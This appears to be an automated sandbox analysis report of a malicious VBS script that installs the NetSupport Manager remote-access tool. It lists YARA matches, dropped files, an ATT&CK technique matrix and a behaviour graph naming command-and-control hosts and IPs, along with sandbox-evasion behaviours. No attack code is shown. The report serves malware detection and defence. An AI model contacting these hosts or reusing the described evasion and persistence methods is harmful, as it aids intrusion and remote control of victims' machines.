                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2F6D0 GetModuleFileNameW,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetCurrentProcess,FreeLibrary,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,28_2_00B2F6D0
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD BlobJump to behavior
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B17600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,28_2_00B17600
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00487600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,30_2_00487600
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00E94E20 SHParseDisplayName,SHBindToParent,CoTaskMemFree,31_2_00E94E20
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001A7600 SHParseDisplayName,SHBindToParent,CoTaskMemFree,32_2_001A7600
                                Source: Yara matchFile source: 36.2.pcicfgui_client.exe.6f950000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.0.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8e7e648.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.2.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.69e80000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6f900000.10.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.6be08bc0.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8fe0848.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6f950000.11.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.0.MSI264F.tmp.ae0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.6f950000.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.2.checkdvd.exe.e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.2.winst64.exe.7ff778ee0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.2.MSI2BE4.tmp.450000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.MSI3FCC.tmp.170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6be08bc0.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.612031c.29.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.613b138.28.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8e7e648.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.0.checkdvd.exe.e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.0.winst64.exe.7ff778ee0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.MSI3FCC.tmp.170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.0.MSI2BE4.tmp.450000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 45.0.client32.exe.730000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.0.MSI51C1.tmp.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6f8e0000.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.2e28d08.25.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.2.MSI51C1.tmp.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.0.pcicfgui_client.exe.d40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6cbc0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6c650000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.2.MSI264F.tmp.ae0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8e70448.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.613b138.28.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.69ea0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.pcicfgui_client.exe.2970000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.client32.exe.6bbd0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8fe0848.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.client32.exe.6bbd0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.3.wscript.exe.8fc5c48.9.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000003.2439151550.0000000008DD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000002.2554269183.00000000004F7000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000002.2658298152.0000000000DE7000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000003.2650049408.0000000000968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000000.2661196429.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.2599536799.0000000000217000.00000008.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000000.2728490909.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000003.2484709944.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2769152495.000000006C860000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2456677584.0000000005E63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2707856987.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000003.2650414598.0000000000954000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000003.2650546737.0000000000968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000000.2597333722.0000000000EEA000.00000008.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2598454747.0000000000EEA000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000000.2597293331.0000000000EDB000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.2673004138.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000000.2645950640.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2695492759.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2628908361.0000000000217000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2666174324.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2770240444.000000006F8EB000.00000002.00000001.01000000.00000024.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000003.2484886914.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2715522100.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.2672514031.0000000000845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2714100665.0000000069E8B000.00000002.00000001.01000000.00000024.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2598416360.0000000000EDB000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002D.00000000.2778639496.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000003.2484627970.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2757688060.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000000.2534438501.0000000000B87000.00000008.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000000.2666385181.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.2767496794.000000006BE3D000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2714876626.000000006A0B0000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000000.2665153542.0000000000D42000.00000002.00000001.01000000.0000001E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2702240534.0000000000732000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000000.2645414113.0000000000DE7000.00000008.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.2548694206.00000000004F7000.00000008.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2439151550.0000000008FC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Windows\System32\drivers\nskbfltr.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI222E.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2B65.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Support\client32.1_2024_11_22_203841_080.dmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI24C5.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\System32\client32provider.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI23F5.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI51A0.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI291F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2610.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2504.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI51C1.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2B95.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI1BA9.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI25E0.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI264F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\3b1427.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI6963.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2B06.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI1BC9.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2465.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2435.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI1C08.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI294F.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2BE4.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI23B6.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2485.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI3FCC.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\3b1425.msi, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\3b1428.msi, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vrep.msi, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vrep[1].msi, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information221
                                Scripting                                		1
                                Replication Through Removable Media                                		631
                                Windows Management Instrumentation                                		221
                                Scripting                                		1
                                LSASS Driver                                		11
                                Disable or Modify Tools                                		21
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                LSASS Driver                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory11
                                Peripheral Device Discovery                                		Remote Desktop Protocol21
                                Input Capture                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		1
                                DLL Side-Loading                                		1
                                Access Token Manipulation                                		3
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares2
                                Clipboard Data                                		11
                                Non-Standard Port                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts22
                                Command and Scripting Interpreter                                		42
                                Windows Service                                		42
                                Windows Service                                		11
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object ModelInput Capture2
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		112
                                Process Injection                                		1
                                DLL Side-Loading                                		LSA Secrets257
                                System Information Discovery                                		SSHKeylogging113
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media12
                                Service Execution                                		RC Scripts1
                                Scheduled Task/Job                                		1
                                File Deletion                                		Cached Domain Credentials2
                                Query Registry                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote Services1
                                PowerShell                                		Startup ItemsStartup Items132
                                Masquerading                                		DCSync1261
                                Security Software Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job661
                                Virtualization/Sandbox Evasion                                		Proc Filesystem2
                                Process Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow661
                                Virtualization/Sandbox Evasion                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                                Process Injection                                		Network Sniffing11
                                Application Window Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                                System Owner/User Discovery                                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561295 Sample: Pyyidau.vbs Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 87 megaeth1337.duckdns.org 2->87 89 okolinabeauty.com 2->89 91 geo.netsupportsoftware.com 2->91 99 Multi AV Scanner detection for submitted file 2->99 101 .NET source code contains potential unpacker 2->101 103 Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines) 2->103 107 14 other signatures 2->107 9 msiexec.exe 205 231 2->9         started        13 wscript.exe 1 2->13         started        15 client32.exe 2->15         started        18 3 other processes 2->18 signatures3 105 Uses dynamic DNS services 87->105 process4 dnsIp5 75 C:\Windows\Installer\...\ARPPRODUCTICON.exe, PE32 9->75 dropped 77 C:\Windows\Installer\MSI6963.tmp, PE32 9->77 dropped 79 C:\Windows\Installer\MSI6914.tmp, PE32 9->79 dropped 85 158 other files (84 malicious) 9->85 dropped 137 Drops executables to the windows directory (C:\Windows) and starts them 9->137 139 Sample is not signed and drops a device driver 9->139 20 MSI3FCC.tmp 9->20         started        24 pcicfgui_client.exe 9->24         started        26 MSI264F.tmp 9->26         started        36 6 other processes 9->36 141 Malicious encrypted Powershell command line found 13->141 143 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->143 145 Suspicious execution chain found 13->145 147 Creates processes via WMI 13->147 28 Pyyidau.vbs.exe 3 17 13->28         started        95 megaeth1337.duckdns.org 185.170.144.66 VDWELLEREE unknown 15->95 97 geo.netsupportsoftware.com 104.26.0.231 CLOUDFLARENETUS United States 15->97 81 C:\Windows\SysWOW64\config\...\loca[1].htm, ASCII 15->81 dropped 149 Drops HTML or HTM files to system directories 15->149 30 client32.exe 15->30         started        32 client32.exe 15->32         started        34 client32.exe 15->34         started        83 C:\Users\user\Desktop\Pyyidau.vbs.exe, PE32 18->83 dropped 38 2 other processes 18->38 file6 signatures7 process8 file9 65 C:\Windows\SysWOW64\pcimsg.dll, PE32 20->65 dropped 109 Found stalling execution ending in API Sleep call 20->109 111 Contains functionality to automate explorer (e.g. start an application) 20->111 113 Enables network access during safeboot for specific services 20->113 40 winst64.exe 20->40         started        115 Hides threads from debuggers 24->115 117 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 24->117 44 pcicfgui_client.exe 24->44         started        67 C:\Users\user\...\50d669f573135aafd57c..vbs, ASCII 28->67 dropped 119 Potential malicious VBS script found (suspicious strings) 28->119 121 Potential malicious VBS script found (has network functionality) 28->121 123 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->123 129 3 other signatures 28->129 46 wscript.exe 19 28->46         started        49 conhost.exe 28->49         started        51 RegAsm.exe 28->51         started        59 9 other processes 28->59 125 Query firmware table information (likely to detect VMs) 30->125 127 Checks if the current machine is a virtual machine (disk enumeration) 30->127 53 cscript.exe 30->53         started        55 conhost.exe 36->55         started        57 attrib.exe 36->57         started        signatures10 process11 dnsIp12 69 C:\Windows\System32\drivers\nskbfltr2.sys, PE32+ 40->69 dropped 71 C:\Windows\System32\drivers\nskbfltr.sys, PE32+ 40->71 dropped 73 C:\Windows\System32\client32provider.dll, PE32+ 40->73 dropped 131 Sample is not signed and drops a device driver 40->131 93 okolinabeauty.com 176.126.113.166, 443, 49730, 49731 SAARGATE-ASVSENETGmbHDE Ukraine 46->93 133 System process connects to network 